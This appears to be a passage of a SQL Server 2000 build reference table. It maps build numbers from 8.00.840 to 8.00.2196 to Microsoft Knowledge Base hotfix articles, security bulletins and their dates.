| 8.00.2196 | 2000.80.2196.0 | [919165 FIX: A memory leak occurs when you run a remote query by using a linked server in SQL Server 2000](http://support.microsoft.com/kb/919165/) | 2006-08-14 |
| 8.00.2194 | 2000.80.2194.0 | [917565 FIX: Error 17883 is logged in the SQL Server error log, and the instance of SQL Server 2000 temporarily stops responding](http://support.microsoft.com/kb/917565/) | 2007-02-21 |
| 8.00.2194 | 2000.80.2194.0 | [917972 FIX: You receive an access violation error message when you try to perform a read of a large binary large object column in SQL Server 2000](http://support.microsoft.com/kb/917972/) | 2006-09-22 |
| 8.00.2192 | 2000.80.2192.0 | [917606 FIX: You may notice a decrease in performance when you run a query that uses the UNION ALL operator in SQL Server 2000 Service Pack 4](http://support.microsoft.com/kb/917606/) | 2006-08-04 |
| 8.00.2191 | 2000.80.2191.0 | [916698 FIX: Error message when you run SQL Server 2000: "Failed assertion = 'lockFound == TRUE'"](http://support.microsoft.com/kb/916698/) | 2006-07-26 |
| 8.00.2191 | 2000.80.2191.0 | [916950 FIX: You may experience heap corruption, and SQL Server 2000 may shut down with fatal access violations when you try to browse files in SQL Server 2000 Enterprise Manager on a Windows Server 2003 x64-based computer](http://support.microsoft.com/kb/916950/) | 2006-10-03 |
| 8.00.2189 | 2000.80.2189.0 | [916652 FIX: An access violation may occur when you run a query on a table that has a multicolumn index in SQL Server 2000](http://support.microsoft.com/kb/916652/) | 2006-07-26 |
| 8.00.2189 | 2000.80.2189.0 | [913438 FIX: The SQL Server process may end unexpectedly when you turn on trace flag -T1204 and a profiler trace is capturing the Lock:DeadLock Chain event in SQL Server 2000 SP4](http://support.microsoft.com/kb/913438/) | 2006-07-19 |
| 8.00.2187 | 2000.80.2187.0 | [915340 FIX: A deadlock occurs when the scheduled SQL Server Agent job that you add or that you update is running in SQL Server 2000](http://support.microsoft.com/kb/915340/) | 2007-06-18 |
| 8.00.2187 | 2000.80.2187.0 | [916287 A cumulative hotfix package is available for SQL Server 2000 Service Pack 4 build 2187](http://support.microsoft.com/kb/916287/) | 2006-10-16 |
| 8.00.2187 | 2000.80.2187.0 | [914384 FIX: The database status changes to Suspect when you perform a bulk copy in a transaction and then roll back the transaction in SQL Server 2000](http://support.microsoft.com/kb/914384/) | 2006-07-26 |
| 8.00.2187 | 2000.80.2187.0 | [915065 FIX: Error message when you try to apply a hotfix on a SQL Server 2000-based computer that is configured as a MSCS node: "An error in updating your system has occurred"](http://support.microsoft.com/kb/915065/) | 2006-12-11 |
| 8.00.2180 | 2000.80.2180.0 | [913789 FIX: The password that you specify in a BACKUP statement appears in the SQL Server Errorlog file or in the Application event log if the BACKUP statement does not run in SQL Server 2000](http://support.microsoft.com/kb/913789/) | 2007-02-19 |
| 8.00.2180 | 2000.80.2180.0 | [913684 FIX: You may receive error messages when you use linked servers in SQL Server 2000 on a 64-bit Itanium processor](http://support.microsoft.com/kb/913684/) | 2006-07-26 |
| 8.00.2175 | 2000.80.2175.0 | [911678 FIX: No rows may be returned, and you may receive an error message when you try to import SQL Profiler trace files into tables by using the fn\_trace\_gettable function in SQL Server 2000](http://support.microsoft.com/kb/911678/) | 2006-07-26 |
| 8.00.2172 | 2000.80.2172.0 | [910707 FIX: When you query a view that was created by using the VIEW\_METADATA option, an access violation may occur in SQL Server 2000](http://support.microsoft.com/kb/910707/) | 2006-07-26 |
| 8.00.2171 | 2000.80.2171.0 | [909369 FIX: Automatic checkpoints on some SQL Server 2000 databases do not run as expected](http://support.microsoft.com/kb/909369/) | 2006-07-26 |
| 8.00.2168 | 2000.80.2168.0 | [907813 FIX: An error occurs when you try to access the Analysis Services performance monitor counter object after you apply Windows Server 2003 SP1](http://support.microsoft.com/kb/907813/) | 2006-11-21 |
| 8.00.2166 | 2000.80.2166.0 | [909734 FIX: An error message is logged, and new diagnostics do not capture the thread stack when the SQL Server User Mode Scheduler (UMS) experiences a nonyielding thread in SQL Server 2000 Service Pack 4](http://support.microsoft.com/kb/909734/) | 2006-07-26 |
| 8.00.2162 | 2000.80.2162.0 | [904660 A cumulative hotfix package is available for SQL Server 2000 Service Pack 4 build 2162](http://support.microsoft.com/kb/904660/) | 2006-09-15 |
| 8.00.2159 | 2000.80.2159.0 | [907250 FIX: You may experience concurrency issues when you run the DBCC INDEXDEFRAG statement in SQL Server 2000](http://support.microsoft.com/kb/907250/) | 2006-07-26 |
| 8.00.2156 | 2000.80.2156.0 | [906790 FIX: You receive an error message when you try to rebuild the master database after you have installed hotfix builds in SQL Server 2000 SP4 64-bit](http://support.microsoft.com/kb/906790/) | 2006-07-25 |
| 8.00.2151 | 2000.80.2151.0 | [903742 FIX: You receive an "Error: 8526, Severity: 16, State: 2" error message in SQL Profiler when you use SQL Query Analyzer to start or to enlist into a distributed transaction after you have installed SQL Server 2000 SP4](http://support.microsoft.com/kb/903742/) | 2006-07-25 |
| 8.00.2151 | 2000.80.2151.0 | [904244 FIX: Incorrect data is inserted unexpectedly when you perform a bulk copy operation by using the DB-Library API in SQL Server 2000 Service Pack 4](http://support.microsoft.com/kb/904244/) | 2007-06-13 |
| 8.00.2148 | 2000.80.2148.0 | [899430 FIX: An access violation may occur when you run a SELECT query and the NO\_BROWSETABLE option is set to ON in Microsoft SQL Server 2000](http://support.microsoft.com/kb/899430/) | 2006-07-25 |
| 8.00.2148 | 2000.80.2148.0 | [899431 FIX: An access violation occurs in the Mssdi98.dll file, and SQL Server crashes when you use SQL Query Analyzer to debug a stored procedure in SQL Server 2000 Service Pack 4](http://support.microsoft.com/kb/899431/) | 2006-07-25 |
| 8.00.2148 | 2000.80.2148.0 | [900390 FIX: The Mssdmn.exe process may use lots of CPU capacity when you perform a SQL Server 2000 full text search of Office Word documents](http://support.microsoft.com/kb/900390/) | 2006-06-01 |
| 8.00.2148 | 2000.80.2148.0 | [900404 FIX: The results of the query may be returned much slower than you expect when you run a query that includes a GROUP BY statement in SQL Server 2000](http://support.microsoft.com/kb/900404/) | 2006-06-01 |
| 8.00.2148 | 2000.80.2148.0 | [901212 FIX: You receive an error message if you use the sp\_addalias or sp\_dropalias procedures when the IMPLICIT\_TRANSACTIONS option is set to ON in SQL Server 2000 SP4](http://support.microsoft.com/kb/901212/) | 2006-07-25 |
| 8.00.2148 | 2000.80.2148.0 | [902150 FIX: Some 32-bit applications that use SQL-DMO and SQL-VDI APIs may stop working after you install SQL Server 2000 Service Pack 4 on an Itanium-based computer](http://support.microsoft.com/kb/902150/) | 2006-06-01 |
| 8.00.2148 | 2000.80.2148.0 | [902955 FIX: You receive a "Getting registry information" message when you run the Sqldiag.exe utility after you install SQL Server 2000 SP4](http://support.microsoft.com/kb/902955/) | 2006-07-25 |
| 8.00.2147 | 2000.80.2147.0 | [899410 FIX: You may experience slow server performance when you start a trace in an instance of SQL Server 2000 that runs on a computer that has more than four processors](http://support.microsoft.com/kb/899410/) | 2006-06-01 |
| 8.00.2145 | 2000.80.2145.0 | [826906 FIX: A query that uses a view that contains a correlated subquery and an aggregate runs slowly](http://support.microsoft.com/kb/826906/) | 2005-10-25 |
| 8.00.2145 | 2000.80.2145.0 | [836651 FIX: You receive query results that were not expected when you use both ANSI joins and non-ANSI joins](http://support.microsoft.com/kb/836651/) | 2006-06-07 |
| 8.00.2066 | 2000.80.2066.0 | [Microsoft Security Bulletin MS12-060](https://technet.microsoft.com/en-us/security/bulletin/MS12-060) | 2012-08-14 |
| 8.00.2065 | 2000.80.2065.0 | [983808 MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 GDR: April 10, 2012](http://support.microsoft.com/kb/983808/) | 2012-04-10 |
| 8.00.2055 | 2000.80.2055.0 | [959420 MS09-004: Vulnerabilities in Microsoft SQL Server could allow remote code execution](http://support.microsoft.com/kb/959420/) | 2009-02-10 |
| 8.00.2040 | 2000.80.2040.0 | [899761 FIX: Not all memory is available when AWE is enabled on a computer that is running a 32-bit version of SQL Server 2000 SP4](http://support.microsoft.com/kb/899761/) | 2006-08-15 |
| 8.00.2039 | 2000.80.2039.0 | [SQL Server 2000 Service Pack 4 (SP4)](http://www.microsoft.com/downloads/details.aspx?FamilyId=8E2DFC8D-C20E-4446-99A9-B7F0213F8BC5) | 2005-05-06 |
| 8.00.2026 | 2000.80.2026.0 | SQL Server 2000 Service Pack 4 (SP4) Beta | ??? |
| 8.00.1547 | 2000.80.1547.0 | [899410 FIX: You may experience slow server performance when you start a trace in an instance of SQL Server 2000 that runs on a computer that has more than four processors](http://support.microsoft.com/kb/899410/) | 2006-06-01 |
| 8.00.1077 | 2000.80.1077.0 | [983814 MS12-070: Description of the security update for SQL Server 2000 Reporting Services Service Pack 2](http://support.microsoft.com/kb/983814) | 2012-10-09 |
| 8.00.1037 | 2000.80.1037.0 | [930484 FIX: CPU utilization may approach 100 percent on a computer that is running SQL Server 2000 after you run the BACKUP DATABASE statement or the BACKUP LOG statement](http://support.microsoft.com/kb/930484/) | 2007-02-02 |
| 8.00.1036 | 2000.80.1036.0 | [929410 FIX: Error message when you run a full-text query in SQL Server 2000: "Error: 17883, Severity: 1, State: 0"](http://support.microsoft.com/kb/929410/) | 2007-01-11 |
| 8.00.1035 | 2000.80.1035.0 | [917593 FIX: The "Audit Logout" event does not appear in the trace results file when you run a profiler trace against a linked server instance in SQL Server 2000](http://support.microsoft.com/kb/917593/) | 2006-09-22 |
| 8.00.1034 | 2000.80.1034.0 | [915328 FIX: You may intermittently experience an access violation error when a query is executed in a parallel plan and the execution plan contains either a HASH JOIN operation or a Sort operation in SQL Server 2000](http://support.microsoft.com/kb/915328/) | 2006-08-09 |
| 8.00.1029 | 2000.80.1029.0 | [902852 FIX: Error message when you run an UPDATE statement that uses two JOIN hints to update a table in SQL Server 2000: "Internal SQL Server error"](http://support.microsoft.com/kb/902852/) | 2006-06-01 |
| 8.00.1027 | 2000.80.1027.0 | [900416 FIX: A 17883 error may occur you run a query that uses a hash join in SQL Server 2000](http://support.microsoft.com/kb/900416/) | 2006-07-25 |
| 8.00.1025 | 2000.80.1025.0 | [899428 FIX: You receive incorrect results when you run a query that uses a cross join operator in SQL Server 2000 SP3](http://support.microsoft.com/kb/899428/) | 2006-06-01 |
| 8.00.1025 | 2000.80.1025.0 | [899430 FIX: An access violation may occur when you run a SELECT query and the NO\_BROWSETABLE option is set to ON in Microsoft SQL Server 2000](http://support.microsoft.com/kb/899430/) | 2006-07-25 |
| 8.00.1024 | 2000.80.1024.0 | [898709 FIX: Error message when you use SQL Server 2000: "Time out occurred while waiting for buffer latch type 3"](http://support.microsoft.com/kb/898709/) | 2006-07-25 |
| 8.00.1021 | 2000.80.1021.0 | [887700 FIX: Server Network Utility may display incorrect protocol properties in SQL Server 2000](http://support.microsoft.com/kb/887700/) | 2006-07-25 |
| 8.00.1020 | 2000.80.1020.0 | [896985 FIX: The Subscriber may not be able to upload changes to the Publisher when you incrementally add an article to a publication in SQL Server 2000 SP3](http://support.microsoft.com/kb/896985/) | 2006-07-25 |
| 8.00.1019 | 2000.80.1019.0 | [897572 FIX: You may receive a memory-related error message when you repeatedly create and destroy an out-of-process COM object within the same batch or stored procedure in SQL Server 2000](http://support.microsoft.com/kb/897572/) | 2006-06-01 |
| 8.00.1017 | 2000.80.1017.0 | [896425 FIX: The BULK INSERT statement silently skips insert attempts when the data value is NULL and the column is defined as NOT NULL for INT, SMALLINT, and BIGINT data types in SQL Server 2000](http://support.microsoft.com/kb/896425/) | 2006-06-01 |
| 8.00.1014 | 2000.80.1014.0 | [895123 FIX: You may receive error message 701, error message 802, and error message 17803 when many hashed buffers are available in SQL Server 2000](http://support.microsoft.com/kb/895123/) | 2006-06-01 |
| 8.00.1014 | 2000.80.1014.0 | [895187 FIX: You receive an error message when you try to delete records by running a Delete Transact-SQL statement in SQL Server 2000](http://support.microsoft.com/kb/895187/) | 2006-07-25 |
| 8.00.1013 | 2000.80.1013.0 | [891866 FIX: The query runs slower than you expected when you try to parse a query in SQL Server 2000](http://support.microsoft.com/kb/891866/) | 2006-06-01 |
| 8.00.1009 | 2000.80.1009.0 | [894257 FIX: You receive an "Incorrect syntax near ')'" error message when you run a script that was generated by SQL-DMO for an Operator object in SQL Server 2000](http://support.microsoft.com/kb/894257/) | 2006-06-01 |
| 8.00.1007 | 2000.80.1007.0 | [893312 FIX: You may receive a "SQL Server could not spawn process\_loginread thread" error message, and a memory leak may occur when you cancel a remote query in SQL Server 2000](http://support.microsoft.com/kb/893312/) | 2006-06-01 |
| 8.00.1003 | 2000.80.1003.0 | [892923 FIX: Differential database backups may not contain database changes in the Page Free Space (PFS) pages in SQL Server 2000](http://support.microsoft.com/kb/892923/) | 2006-06-01 |
| 8.00.1001 | 2000.80.1001.0 | [892205 FIX: You may receive a 17883 error message when SQL Server 2000 performs a very large hash operation](http://support.microsoft.com/kb/892205/) | 2006-06-01 |
| 8.00.1000 | 2000.80.1000.0 | [891585 FIX: Database recovery does not occur, or a user database is marked as suspect in SQL Server 2000](http://support.microsoft.com/kb/891585/) | 2006-06-01 |
| 8.00.997 | 2000.80.997.0 | [891311 FIX: You cannot create new TCP/IP socket based connections after error messages 17882 and 10055 are written to the Microsoft SQL Server 2000 error log](http://support.microsoft.com/kb/891311/) | 2006-07-18 |
| 8.00.996 | 2000.80.996.0 | [891017 FIX: SQL Server 2000 may stop responding to other requests when you perform a large deallocation operation](http://support.microsoft.com/kb/891017/) | 2006-06-01 |
| 8.00.996 | 2000.80.996.0 | [891268 FIX: You receive a 17883 error message and SQL Server 2000 may stop responding to other requests when you perform large in-memory sort operations](http://support.microsoft.com/kb/891268/) | 2006-06-01 |
| 8.00.994 | 2000.80.994.0 | [890942 FIX: Some complex queries are slower after you install SQL Server 2000 Service Pack 2 or SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/890942/) | 2006-06-01 |
| 8.00.994 | 2000.80.994.0 | [890768 FIX: You experience non-convergence in a replication topology when you unpublish or drop columns from a dynamically filtered publication in SQL Server 2000](http://support.microsoft.com/kb/890768/) | 2006-06-01 |
| 8.00.994 | 2000.80.994.0 | [890767 FIX: You receive a "Server: Msg 107, Level 16, State 3, Procedure TEMP\_VIEW\_Merge, Line 1" error message when the sum of the length of the published column names in a merge publication exceeds 4,000 characters in SQL Server 2000](http://support.microsoft.com/kb/890767/) | 2006-06-01 |
| 8.00.993 | 2000.80.993.0 | [890925 FIX: The @@ERROR system function may return an incorrect value when you execute a Transact-SQL statement that uses a parallel execution plan in SQL Server 2000 32-bit or in SQL Server 2000 64-bit](http://support.microsoft.com/kb/890925/) | 2006-06-01 |
| 8.00.993 | 2000.80.993.0 | [888444 FIX: You receive a 17883 error in SQL Server 2000 Service Pack 3 or in SQL Server 2000 Service Pack 3a when a worker thread becomes stuck in a registry call](http://support.microsoft.com/kb/888444/) | 2006-06-01 |
| 8.00.993 | 2000.80.993.0 | [890742 FIX: Error message when you use a loopback linked server to run a distributed query in SQL Server 2000: "Could not perform the requested operation because the minimum query memory is not available"](http://support.microsoft.com/kb/890742/) | 2006-05-15 |
| 8.00.991 | 2000.80.991.0 | [889314 FIX: Non-convergence may occur in a merge replication topology if the primary connection to the publisher is disconnected](http://support.microsoft.com/kb/889314/) | 2006-06-01 |
| 8.00.990 | 2000.80.990.0 | [890200 FIX: SQL Server 2000 stops listening for new TCP/IP Socket connections unexpectedly after error message 17882 is written to the SQL Server 2000 error log](http://support.microsoft.com/kb/890200/) | 2006-06-01 |
| 8.00.988 | 2000.80.988.0 | [889166 FIX: You receive a "Msg 3628" error message when you run an inner join query in SQL Server 2000](http://support.microsoft.com/kb/889166/) | 2006-06-01 |
| 8.00.985 | 2000.80.985.0 | [889239 FIX: Start times in the SQL Profiler are different for the Audit:Login and Audit:Logout Events in SQL Server 2000](http://support.microsoft.com/kb/889239/) | 2006-06-01 |
| 8.00.980 | 2000.80.980.0 | [887974 FIX: A fetch on a dynamic cursor can cause unexpected results in SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/887974/) | 2006-06-01 |
| 8.00.977 | 2000.80.977.0 | [888007 You receive a "The product does not have a prerequisite update installed" error message when you try to install a SQL Server 2000 post-Service Pack 3 hotfix](http://support.microsoft.com/kb/888007/) | 2005-08-31 |
| 8.00.973 | 2000.80.973.0 | [884554 FIX: A SPID stops responding with a NETWORKIO (0x800) waittype in SQL Server Enterprise Manager when SQL Server tries to process a fragmented TDS network packet](http://support.microsoft.com/kb/884554/) | 2006-06-01 |
| 8.00.972 | 2000.80.972.0 | [885290 FIX: An assertion error occurs when you insert data in the same row in a table by using multiple connections to an instance of SQL Server](http://support.microsoft.com/kb/885290/) | 2006-06-01 |
| 8.00.970 | 2000.80.970.0 | [872842 FIX: A CHECKDB statement reports a 2537 corruption error after SQL Server transfers data to a sql\_variant column in SQL Server 2000](http://support.microsoft.com/kb/872842/) | 2006-06-01 |
| 8.00.967 | 2000.80.967.0 | [878501 FIX: You may receive an error message when you run a SET IDENTITY\_INSERT ON statement on a table and then try to insert a row into the table in SQL Server 2000](http://support.microsoft.com/kb/878501/) | 2006-06-01 |
| 8.00.962 | 2000.80.962.0 | [883415 FIX: A user-defined function returns results that are not correct for a query](http://support.microsoft.com/kb/883415/) | 2006-06-01 |
| 8.00.961 | 2000.80.961.0 | [873446 FIX: An access violation exception may occur when multiple users try to perform data modification operations at the same time that fire triggers that reference a deleted or an inserted table in SQL Server 2000 on a computer that is running SMP](http://support.microsoft.com/kb/873446/) | 2006-06-01 |
| 8.00.959 | 2000.80.959.0 | [878500 FIX: An Audit Object Permission event is not produced when you run a TRUNCATE TABLE statement](http://support.microsoft.com/kb/878500/) | 2006-06-01 |
| 8.00.957 | 2000.80.957.0 | [870994 FIX: An access violation exception may occur when you run a query that uses index names in the WITH INDEX option to specify an index hint](http://support.microsoft.com/kb/870994/) | 2006-06-01 |
| 8.00.955 | 2000.80.955.0 | [867798 FIX: The @date\_received parameter of the xp\_readmail extended stored procedure incorrectly returns the date and the time that an e-mail message is submitted by the sender in SQL Server 2000](http://support.microsoft.com/kb/867798/) | 2007-01-08 |
| 8.00.954 | 2000.80.954.0 | [843282 FIX: The Osql.exe utility does not run a Transact-SQL script completely if you start the program from a remote session by using a background service and then log off the console session](http://support.microsoft.com/kb/843282/) | 2007-01-05 |
| 8.00.952 | 2000.80.952.0 | [867878 FIX: The Log Reader Agent may cause 17883 error messages](http://support.microsoft.com/kb/867878/) | 2006-06-01 |
| 8.00.952 | 2000.80.952.0 | [867879 FIX: Merge replication non-convergence occurs with SQL Server CE subscribers](http://support.microsoft.com/kb/867879/) | 2006-06-01 |
| 8.00.952 | 2000.80.952.0 | [867880 FIX: Merge Agent may fail with an "Invalid character value for cast specification" error message](http://support.microsoft.com/kb/867880/) | 2006-06-01 |
| 8.00.949 | 2000.80.949.0 | [843266 FIX: Shared page locks can be held until end of the transaction and can cause blocking or performance problems in SQL Server 2000 Service Pack 3 (SP3)](http://support.microsoft.com/kb/843266/) | 2006-06-02 |
| 8.00.948 | 2000.80.948.0 | [843263 FIX: You may receive an 8623 error message when you try to run a complex query on an instance of SQL Server](http://support.microsoft.com/kb/843263/) | 2006-06-01 |
| 8.00.944 | 2000.80.944.0 | [839280 FIX: SQL debugging does not work in Visual Studio .NET after you install Windows XP Service Pack 2](http://support.microsoft.com/kb/839280/) | 2006-06-05 |
| 8.00.937 | 2000.80.937.0 | [841776 FIX: Additional diagnostics have been added to SQL Server 2000 to detect unreported read operation failures](http://support.microsoft.com/kb/841776/) | 2006-06-01 |
| 8.00.936 | 2000.80.936.0 | [841627 FIX: SQL Server 2000 may underestimate the cardinality of a query expression under certain circumstances](http://support.microsoft.com/kb/841627/) | 2006-06-01 |
| 8.00.935 | 2000.80.935.0 | [841401 FIX: You may notice incorrect values for the "Active Transactions" counter when you perform multiple transactions on an instance of SQL Server 2000 that is running on an SMP computer](http://support.microsoft.com/kb/841401/) | 2006-06-01 |
| 8.00.934 | 2000.80.934.0 | [841404 FIX: You may receive a "The query processor could not produce a query plan" error message in SQL Server when you run a query that includes multiple subqueries that use self-joins](http://support.microsoft.com/kb/841404/) | 2006-06-01 |
| 8.00.933 | 2000.80.933.0 | [840856 FIX: The MSSQLServer service exits unexpectedly in SQL Server 2000 Service Pack 3](http://support.microsoft.com/kb/840856/) | 2006-06-02 |
| 8.00.929 | 2000.80.929.0 | [839529 FIX: 8621 error conditions may cause SQL Server 2000 64-bit to close unexpectedly](http://support.microsoft.com/kb/839529/) | 2006-06-01 |
| 8.00.928 | 2000.80.928.0 | [839589 FIX: The thread priority is raised for some threads in a parallel query](http://support.microsoft.com/kb/839589/) | 2006-06-01 |
| 8.00.927 | 2000.80.927.0 | [839688 FIX: Profiler RPC events truncate parameters that have a text data type to 16 characters](http://support.microsoft.com/kb/839688/) | 2006-06-01 |
| 8.00.926 | 2000.80.926.0 | [839523 FIX: An access violation exception may occur when you update a text column by using a stored procedure in SQL Server 2000](http://support.microsoft.com/kb/839523/) | 2006-06-01 |
| 8.00.923 | 2000.80.923.0 | [838460 FIX: The xp\_logininfo procedure may fail with error 8198 after you install Q825042 or any hotfix with SQL Server 8.00.0840 or later](http://support.microsoft.com/kb/838460/) | 2006-06-01 |
| 8.00.922 | 2000.80.922.0 | [837970 FIX: You may receive an "Invalid object name..." error message when you run the DBCC CHECKCONSTRAINTS Transact-SQL statement on a table in SQL Server 2000](http://support.microsoft.com/kb/837970/) | 2005-10-25 |
| 8.00.919 | 2000.80.919.0 | [837957 FIX: When you use Transact-SQL cursor variables to perform operations that have large iterations, memory leaks may occur in SQL Server 2000](http://support.microsoft.com/kb/837957/) | 2005-10-25 |
| 8.00.916 | 2000.80.916.0 | [317989 FIX: Sqlakw32.dll May Corrupt SQL Statements](http://support.microsoft.com/kb/317989/) | 2005-09-27 |
| 8.00.915 | 2000.80.915.0 | [837401 FIX: Rows are not successfully inserted into a table when you use the BULK INSERT command to insert rows](http://support.microsoft.com/kb/837401/) | 2005-10-25 |
| 8.00.913 | 2000.80.913.0 | [836651 FIX: You receive query results that were not expected when you use both ANSI joins and non-ANSI joins](http://support.microsoft.com/kb/836651/) | 2006-06-07 |
| 8.00.911 | 2000.80.911.0 | [837957 FIX: When you use Transact-SQL cursor variables to perform operations that have large iterations, memory leaks may occur in SQL Server 2000](http://support.microsoft.com/kb/837957/) | 2005-10-25 |
| 8.00.910 | 2000.80.910.0 | [834798 FIX: SQL Server 2000 may not start if many users try to log in to SQL Server when SQL Server is trying to start](http://support.microsoft.com/kb/834798/) | 2005-10-25 |
| 8.00.908 | 2000.80.908.0 | [834290 FIX: You receive a 644 error message when you run an UPDATE statement and the isolation level is set to READ UNCOMMITTED](http://support.microsoft.com/kb/834290/) | 2005-10-25 |
| 8.00.904 | 2000.80.904.0 | [834453 FIX: The Snapshot Agent may fail after you make schema changes to the underlying tables of a publication](http://support.microsoft.com/kb/834453/) | 2005-04-22 |
| 8.00.892 | 2000.80.892.0 | [833710 FIX: You receive an error message when you try to restore a database backup that spans multiple devices](http://support.microsoft.com/kb/833710/) | 2005-10-25 |
| 8.00.891 | 2000.80.891.0 | [836141 FIX: An access violation exception may occur when SQL Server runs many parallel query processing operations on a multiprocessor computer](http://support.microsoft.com/kb/836141/) | 2005-04-01 |
| 8.00.879 | 2000.80.879.0 | [832977 FIX: The DBCC PSS Command may cause access violations and 17805 errors in SQL Server 2000](http://support.microsoft.com/kb/832977/) | 2005-10-25 |
| 8.00.878 | 2000.80.878.0 | [831950 FIX: You receive error message 3456 when you try to apply a transaction log to a server](http://support.microsoft.com/kb/831950/) | 2005-10-25 |
| 8.00.876 | 2000.80.876.0 | [830912 FIX: Key Names Read from an .Ini File for a Dynamic Properties Task May Be Truncated](http://support.microsoft.com/kb/830912/) | 2005-10-25 |
| 8.00.876 | 2000.80.876.0 | [831997 FIX: An invalid cursor state occurs after you apply Hotfix 8.00.0859 or later in SQL Server 2000](http://support.microsoft.com/kb/831997/) | 2005-10-25 |
| 8.00.876 | 2000.80.876.0 | [831999 FIX: An AWE system uses more memory for sorting or for hashing than a non-AWE system in SQL Server 2000](http://support.microsoft.com/kb/831999/) | 2005-10-25 |
| 8.00.873 | 2000.80.873.0 | [830887 FIX: Some queries that have a left outer join and an IS NULL filter run slower after you install SQL Server 2000 post-SP3 hotfix](http://support.microsoft.com/kb/830887/) | 2005-10-25 |
| 8.00.871 | 2000.80.871.0 | [830767 FIX: SQL Query Analyzer may stop responding when you close a query window or open a file](http://support.microsoft.com/kb/830767/) | 2005-10-25 |
| 8.00.871 | 2000.80.871.0 | [830860 FIX: The performance of a computer that is running SQL Server 2000 degrades when query execution plans against temporary tables remain in the procedure cache](http://support.microsoft.com/kb/830860/) | 2005-10-25 |
| 8.00.870 | 2000.80.870.0 | [830262 FIX: Unconditional Update May Not Hold Key Locks on New Key Values](http://support.microsoft.com/kb/830262/) | 2005-10-25 |
| 8.00.869 | 2000.80.869.0 | [830588 FIX: Access violation when you trace keyset-driven cursors by using SQL Profiler](http://support.microsoft.com/kb/830588/) | 2005-10-25 |
| 8.00.866 | 2000.80.866.0 | [830366 FIX: An access violation occurs in SQL Server 2000 when a high volume of local shared memory connections occur after you install security update MS03-031](http://support.microsoft.com/kb/830366/) | 2006-01-16 |
| 8.00.865 | 2000.80.865.0 | [830395 FIX: An access violation occurs during compilation if the table contains statistics for a computed column](http://support.microsoft.com/kb/830395/) | 2005-10-25 |
| 8.00.865 | 2000.80.865.0 | [828945 FIX: You cannot insert explicit values in an IDENTITY column of a SQL Server table by using the SQLBulkOperations function or the SQLSetPos ODBC function in SQL Server 2000](http://support.microsoft.com/kb/828945/) | 2005-10-25 |
| 8.00.863 | 2000.80.863.0 | [829205 FIX: Query performance may be slow and may be inconsistent when you run a query while another query that contains an IN operator with many values is compiled](http://support.microsoft.com/kb/829205/) | 2005-10-25 |
| 8.00.863 | 2000.80.863.0 | [829444 FIX: A floating point exception occurs during the optimization of a query](http://support.microsoft.com/kb/829444/) | 2005-10-25 |
| 8.00.859 | 2000.80.859.0 | [821334 FIX: Issues that are resolved in SQL Server 2000 build 8.00.0859](http://support.microsoft.com/kb/821334/) | 2005-03-31 |
| 8.00.858 | 2000.80.858.0 | [828637 FIX: Users Can Control the Compensating Change Process in Merge Replication](http://support.microsoft.com/kb/828637/) | 2005-10-25 |
| 8.00.857 | 2000.80.857.0 | [828017 The Knowledge Base (KB) Article You Requested Is Currently Not Available](http://support.microsoft.com/kb/828017/) | ??? |
| 8.00.857 | 2000.80.857.0 | [827714 FIX: A query may fail with retail assertion when you use the NOLOCK hint or the READ UNCOMMITTED isolation level](http://support.microsoft.com/kb/827714/) | 2005-11-23 |
| 8.00.857 | 2000.80.857.0 | [828308 FIX: An Internet Explorer script error occurs when you access metadata information by using DTS in SQL Server Enterprise Manager](http://support.microsoft.com/kb/828308/) | 2005-10-25 |
| 8.00.856 | 2000.80.856.0 | [828096 FIX: Key Locks Are Held Until the End of the Statement for Rows That Do Not Pass Filter Criteria](http://support.microsoft.com/kb/828096/) | 2005-10-25 |
| 8.00.854 | 2000.80.854.0 | [828699 FIX: An Access Violation Occurs When You Run DBCC UPDATEUSAGE on a Database That Has Many Objects](http://support.microsoft.com/kb/828699/) | 2005-10-25 |
| 8.00.852 | 2000.80.852.0 | [830466 FIX: You may receive an "Internal SQL Server error" error message when you run a Transact-SQL SELECT statement on a view that has many subqueries in SQL Server 2000](http://support.microsoft.com/kb/830466/) | 2005-04-01 |
| 8.00.852 | 2000.80.852.0 | [827954 FIX: Slow Execution Times May Occur When You Run DML Statements Against Tables That Have Cascading Referential Integrity](http://support.microsoft.com/kb/827954/) | 2005-10-25 |
| 8.00.851 | 2000.80.851.0 | [826754 FIX: A Deadlock Occurs If You Run an Explicit UPDATE STATISTICS Command](http://support.microsoft.com/kb/826754/) | 2005-10-25 |
| 8.00.850 | 2000.80.850.0 | [826860 FIX: Linked Server Query May Return NULL If It Is Performed Through a Keyset Cursor](http://support.microsoft.com/kb/826860/) | 2005-10-25 |
| 8.00.850 | 2000.80.850.0 | [826815 FIX: You receive an 8623 error message in SQL Server when you try to run a query that has multiple correlated subqueries](http://support.microsoft.com/kb/826815/) | 2005-10-25 |
| 8.00.850 | 2000.80.850.0 | [826906 FIX: A query that uses a view that contains a correlated subquery and an aggregate runs slowly](http://support.microsoft.com/kb/826906/) | 2005-10-25 |
| 8.00.848 | 2000.80.848.0 | [826822 FIX: A Member of the db\_accessadmin Fixed Database Role Can Create an Alias for the dbo Special User](http://support.microsoft.com/kb/826822/) | 2005-10-25 |
| 8.00.847 | 2000.80.847.0 | [826433 PRB: Additional SQL Server Diagnostics Added to Detect Unreported I/O Problems](http://support.microsoft.com/kb/826433/) | 2005-10-25 |
| 8.00.845 | 2000.80.845.0 | [826364 FIX: A Query with a LIKE Comparison Results in a Non-Optimal Query Plan When You Use a Hungarian SQL Server Collation](http://support.microsoft.com/kb/826364/) | 2005-10-05 |
| 8.00.845 | 2000.80.845.0 | [825854 FIX: No Exclusive Locks May Be Taken If the DisAllowsPageLocks Value Is Set to True](http://support.microsoft.com/kb/825854/) | 2005-10-25 |
| 8.00.844 | 2000.80.844.0 | [826080 FIX: SQL Server 2000 protocol encryption applies to JDBC clients](http://support.microsoft.com/kb/826080/) | 2006-10-17 |
| 8.00.842 | 2000.80.842.0 | [825043 FIX: Rows are unexpectedly deleted when you run a distributed query to delete or to update a linked server table](http://support.microsoft.com/kb/825043/) | 2005-10-25 |
| 8.00.841 | 2000.80.841.0 | [825225 FIX: You receive an error message when you run a parallel query that uses an aggregation function or the GROUP BY clause](http://support.microsoft.com/kb/825225/) | 2005-10-25 |
| 8.00.840 | 2000.80.840.0 | [319477 FIX: Extremely Large Number of User Tables on AWE System May Cause BPool::Map Errors](http://support.microsoft.com/kb/319477/) | 2005-09-27 |
